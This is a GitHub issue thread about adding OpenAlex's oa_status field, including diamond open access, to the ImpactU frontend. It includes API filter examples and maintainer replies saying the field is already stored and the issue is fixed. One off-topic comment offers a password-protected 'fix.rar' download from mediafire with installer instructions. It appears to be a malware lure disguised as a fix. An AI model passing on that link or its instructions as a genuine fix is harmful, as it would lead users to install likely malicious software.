### ISSUE TITLE
integration of oa_status

### ISSUE THREAD

**Issue by restrepo** [colav/impactu#272]
In OpenAlex the `oa_status` which includes the type `diamond` at the `works` level:

https://api.openalex.org/works?filter=oa_status:diamond

Includes this information in the popup of the article in the fronted in a similar way to OpenAlex:

![image](https://github.com/user-attachments/assets/8cda500a-2fbf-45cf-92cd-068517348234)

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by restrepo** [comment]
Examples in OpenAlex to implement in future filters in the "Productos" o "Revistas" profile:
* Diamond work in the field  "Physics and Astronomy"
https://api.openalex.org/works?filter=oa_status:diamond,topics.field.id:31
* Diamond work in the subfield "Nuclear and High Energy Physics"
https://api.openalex.org/works?filter=oa_status:diamond,topics.subfield.id:3106
* Diamond work with topic: "Particle Physics and High-Energy Collider Experiments"
https://api.openalex.org/works?filter=oa_status:diamond,topics.id:T10048

**Comment by omazapa** [comment]
ese campo ya lo guardamos
https://github.com/colav/Kahi_plugins/blob/main/Kahi_openalex_works/kahi_openalex_works/parser.py#L70
es solo que está en 
bibliographic_info

**Comment by omazapa** [comment]
corregido en issue https://github.com/colav/impactu/issues/278
